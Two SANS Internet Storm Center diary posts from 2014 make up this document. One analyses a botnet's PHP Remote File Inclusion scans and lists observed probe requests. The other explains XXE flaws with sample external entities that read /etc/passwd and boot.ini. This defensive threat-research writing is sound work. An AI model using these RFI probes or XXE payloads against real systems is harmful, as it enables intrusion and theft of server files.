Massive PHP RFI scans

Published: 2014-01-09. Last Updated: 2014-01-11 11:02:29 UTC
by Bojan Zdrnja (Version: 2)
8 comment(s)
Today one of our readers, Yinette, sent in a pcap of a pretty massive PHP RFI scans. Yinette has been seeing this for quite some time and the number of requests sent by this (yet unknown) bot or botnet kept rising.
Judging by the source IP address the bots appear to be running on compromised web servers with typical CPanel installations and large numbers of hosted virtual servers.
 
The scanning requests are relatively fast and in the capture Yinette made the bot constantly sent at least 2 requests per second. All requests try to exploit a RFI vulnerability (I haven’t checked yet to see if all of them are well known, but a cursory inspection says most of them are well known) and the file included is the humans.txt static file on Google (http://www.google.com/humans.txt).
 
The bot almost certainly parses the output and if it sees contents of the humans.txt file it knows that the site has a RFI (Remote File Inclusion) vulnerability. Google’s availability and uptime help of course.
 
Some observed requests are shown below:
 
GET /kernel/class/ixpts.class.php?IXP_ROOT_PATH=http://www.google.com/humans.txt? HTTP/1.0
GET /kernel/loadkernel.php?installPath=http://www.google.com/humans.txt? HTTP/1.0
GET /kmitaadmin/kmitam/htmlcode.php?file=http://www.google.com/humans.txt? HTTP/1.0
GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.google.com/humans.txt? HTTP/1.0
GET /lang/leslangues.php?fichier=http://www.google.com/humans.txt? HTTP/1.0
GET /lang_english/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_english/lang_activity.php?phpbb_root_path=http://www.google.com/humans.txt? HTTP/1.0
GET /language/lang_english/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_admin_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.google.com/humans.txt?a= HTTP/1.0
GET /latestposts.php?forumspath=http://www.google.com/humans.txt? HTTP/1.0
GET /latex.php?bibtexrootrel=http://www.google.com/humans.txt? HTTP/1.0
GET /layout/default/params.php?gConf[dir][layouts]=http://www.google.com/humans.txt? HTTP/1.0
GET /ldap/authldap.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /learnPath/include/scormExport.inc.php?includePath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib.editor.inc.php?sys_path=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Calendar.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Comment.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Rss.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/Loggix/Module/Trackback.php?pathToIndex=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/action/rss.php?lib=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/activeutil.php?set[include_path]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/addressbook.php?GLOBALS[basedir]=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/armygame.php?libpath=http://www.google.com/humans.txt? HTTP/1.0
GET /lib/authuser.php?root=http://www.google.com/humans.txt? HTTP/1.0
 
This is only a small part of all the requests the bot sends. In total, on Yinette’s web site it sent 804 requests (that’s 804 vulnerabilities it’s trying to exploit)! This indeed might be someone trying to build a big(er) botnet.

Are you seeing same/similar requests on your web site too? Or maybe you managed to catch the bot on a compromised machine or a honeypot? Let us know!

UPDATE:

We received a lot of submissions regarding this – thanks to everyone that sent their logs/observations in! After analyzing logs we received it appears that these scans started around 21st of December 2013 and they are still going on.
 
Also, the capture Yinette did appear to have captured only a part of the attack. We received several submissions showing exact requests (that fortunately resulted in 404 errors :) for most of them).
 
The total number of requests done is even higher – the bot tries to access 2217 (!!!) URIs. Every URI accessed is a RFI vulnerability and they always (at least in these attacks) try to retrieve the humans.txt file from Google (it would be interesting if someone at Google could analyze their logs of requests for this file).
 
So, this is getting pretty large, unfortunately we haven’t seen the bot’s code so far – if you do manage to catch it please upload it through our contact form so we can analyze it.

--
Bojan
@bojanz
INFIGO IS

Keywords: rfi scan
8 comment(s)
Simple router backdoor/exposed admin check: https://isc.sans.edu/quickscan.html (login required. now fixed to work with all email addresses)
Oracle announced critical patches for next Tuesday - patching 147 (!!!) vulnerabilities: http://www.oracle.com/technetwork/topics/security/cpujan2014-1972949.html
Microsoft Security Bulletin Advance Notification for January 2014 http://technet.microsoft.com/en-us/security/bulletin/ms14-jan
Secure Your Home Network with the January edition of the OUCH! Newsletter: http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-201401_en.pdf

Is XXE the new SQLi?

Published: 2014-01-09. Last Updated: 2014-01-09 08:37:00 UTC
by Bojan Zdrnja (Version: 1)
6 comment(s)
Many modern applications today use XML documents to transfer data between clients and servers. Due to its simplicity, XML is actually great for this and is therefore very often used for representation of various data structures.
 
Typically a rich web application will use XML to send data from the web server to the server side. This XML document, which might contain various data structures related to the web application, is then processed on the server side. Here we can see a typical problem with untrusted input – since an attacker can control anything on the client side he can impact integrity of the XML document that is submitted to the server. Generally this should not be a problem unless the following happens.
 
Since the web application (on the server side) receives the XML document we just sent, it has to somehow parse it. Depending on the framework the application uses on the server side, it’s is most often (especially business applications) either a Java or a .NET application; other frameworks typically rely on libxml2.
 
The security problem here is in a special structure defined by the XML standard, entity. Every entity has certain content and are normally used throughout the XML document. However, one specific entity type is particularly dangerous: external entities.
 
External entity declaration further allows declaration of two types: SYSTEM and PUBLIC. The SYSTEM external entity is what we are interested about – it allows one to specify a URI which will be used during dereferencing to replace the entity. One example of such an entity is shown below:
 
<!ENTITY ISCHandler
SYSTEM “https://isc.sans.edu/api/handler”>
 
Now when parsing such an XML document, wherever we have the ISCHandler entity, the parser will replace it with the contents of the retrieved URI. Pretty bad already, isn’t it? But it gets even worse – by exploiting this we can include any local file by simply pointing to it:
 
<!ENTITY ISCHandler
SYSTEM “file:///etc/passwd”>
 
Or on Windows
 
<!ENTITY ISCHandler
SYSTEM “file:///C:/boot.ini”>
 
As long as our current process has privileges to read the requested file, the XML parser will simply retrieve it and put it when it finds a reference to the ISCHandler entity (&ISCHandler;).
 
The impact of such a vulnerability is pretty obvious. A malicious attacker can actually do much more – just use your imagination:
  • We can probably DoS the application by reading from a file such as /dev/random or /dev/zero.
  • We can port scan internal IP addresses, or at least try to find internal web servers.
Obviously, probably the most dangerous “feature” is extraction of data – similarly to how we would pull data from a database with a SQL Injection vulnerability, we can read (almost) any file on the hard disk. This includes not only the password file but potentially more sensitive files such as DB connection parameters and what not. Depending on the framework, including a directory will give us even the directory’s listing, so we don’t have to blindly guess file names! Very nasty.
Everything so far is nothing new really, however in last X pentesting engagements, for some reason XXE vulnerabilities started popping up. So what is the reason for that? First of all, some libraries allow external entity definitions by default. In such cases, the developer himself has to explicitly disable inclusion of external entities. This is probably still valid for Java XML libraries while with .NET 4.0 Microsoft changed the default behavior not to allow external entities (in .NET 3.5 they are allowed).
 
So, while XXE will not become as dangerous as SQLi (hey, the subject was there to get your attention), we do find them more often than before which means that we should raise awareness about such vulnerabilities.
 
--
Bojan
@bojanz
INFIGO IS
Keywords: xxe
6 comment(s)
ISC StormCast for Thursday, January 9th 2014 http://isc.sans.edu/podcastdetail.html?id=3767

Comments


Diary Archives